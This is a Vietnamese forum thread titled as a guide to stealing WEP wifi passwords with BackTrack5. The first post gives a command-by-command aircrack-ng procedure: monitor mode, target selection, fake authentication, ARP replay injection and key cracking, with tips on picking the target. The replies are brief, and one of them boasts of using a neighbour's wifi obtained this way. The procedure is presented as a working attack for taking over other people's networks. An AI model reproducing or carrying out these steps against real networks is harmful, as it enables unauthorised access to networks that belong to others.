chôm pass wifi wep bằng backtrack5

[valentine1292002]

về vấn đề này nhiều ng` post rồi, và nó cũng k khó, nhưng đây là kinh nghiệm do chính mình làm nên share lên đây cùng tất cả người thôi

các bước thực hiện:

>iwconfig

-> dùng wlan0

>airmon-ng start wlan0

-> sẽ activate card ảo mon0

Có thể yêu cầu kill 1 số process ảnh hưởng

>kill [id]

>iwconfig

-> khi đó mon0 sẽ có mode:monitor là dùng được

>airodump-ng mon0

-> cho 1 bảng, qsat BSSID (MAC AP), CH, STATION

Mách nước: Cột PWR trong nhóm các AP cho thấy mức độ mạnh của tín hiệu (signal level). Nếu bạn muốn chọn một AP là mục tiêu trong số nhiều AP xuất hiện trong bảng, hãy chọn AP nào có chỉ số PWR cao vì điều này đồng nghĩa với mức tín hiệu cao và tín hiệu mạnh = tốc độ bắt gói dữ liệu cao.

Đối với một máy client đang hoạt động, bạn cũng có thể thấy một cột RXQ, dùng để đo tỷ lệ phần trăm của gói dữ liệu nhận được thành công trong vòng 10 giây gần nhất. Cũng như trên, một chỉ sao cao hơn sẽ tốt hơn.

New Client

>airodump-ng -w wep -c CH --bssid BSSID mon0

Khi chúng ta vừa xác định được AP mục tiêu sử dụng chế độ bảo mật (an ninh) WEP, chúng ta cần bắt đủ các Ivs bằng airodump để cho airCr-ack-ng sử dụng. Cột #Data trong airodump-ng cho biết có bao nhiêu IVs vừa bắt được và cột #/s cho biết tốc độ bắt dữ liệu trên mỗi giây.

Cần bao nhiêu Ivs?

Theo lý thuyết là airCr-ack-ng phiên bản 0.9 vừa giúp giảm số lượng IVs cần có đi đáng kể, khoảng 20.000 đối với khóa WEP 64 và 40.000 đối với khóa WEP 128, nhưng nó chỉ hoạt động với gói dữ liệu ARP bắt được ở dạng đầy đủ (không phải là dạng –ivs).

Nhưng theo trải nghiệm thì đến khoảng 15000 Ivs là đủ

New Client

>aireplay-ng -1 20 –a BSSID –h STATION mon0

-> đợi đến khi có association successful (AID:1)

>aireplay-ng -3 –b BSSID –h STATION mon0

-> đợi đến khi đủ Ivs

New Client

>ls –l (để thấy có wep-01.cap)

>airCr-ack-ng wep-01.cap

-> tiến hành test key, đến khi nào báo key found thì sẽ cho ra đoạn mã hex, ta cần chuyển về ASCII sẽ cho ra key thực

(nếu key ngắn thì máy sẽ tự cho ra key dạng ASCII -> xài luôn )

Đoạn aireplay có thể làm như sau:

New Client >aireplay-ng -1 0 -a BSSID mon0

New Client >aireplay-ng -3 -b BSSID mon0

tham khảo thêm:

You must be registered for see links

You must be registered for see links

You must be registered for see links

trên windows có thằng ERW (giờ là bản 2.9) có hỗ trợ tool khá tốt, gần như đủ bằng backtrack về mặt wifi nhưng mà cái nầy mình k biết dùng nên tất cả ng` tự tìm hiểu thêm nhé

 

[nhphuc1995]

Để mình thử một lần xem sao.

 

[012_456]

ngâm cứu sau. đang dùng wifi chùa ( hack được ) bao h cách cũ k làm được thì lên đây ngâm cứu. oánh dấu phát

 

[Daniels]

Wep thì đơn giản rồi khó là WPA kìa.

 

[nimbus2000_tiachop]

thì mình nói ngay từ đầu là nó k khó mà

share cho ai chưa làm bao giờ thôi

 

[moitinhdau01_boy1407]

bài viết cũng được ak, nếu thêm hình và bố cụ đẹp tí nữa thì dễ làm hơn

 

[Nick]

để xem nào

 

[Korbin]

pass là số hay chữ thì không nói gì, nó cho thêm cái @ vô thì bác ngồi mò tới cóc mọc râu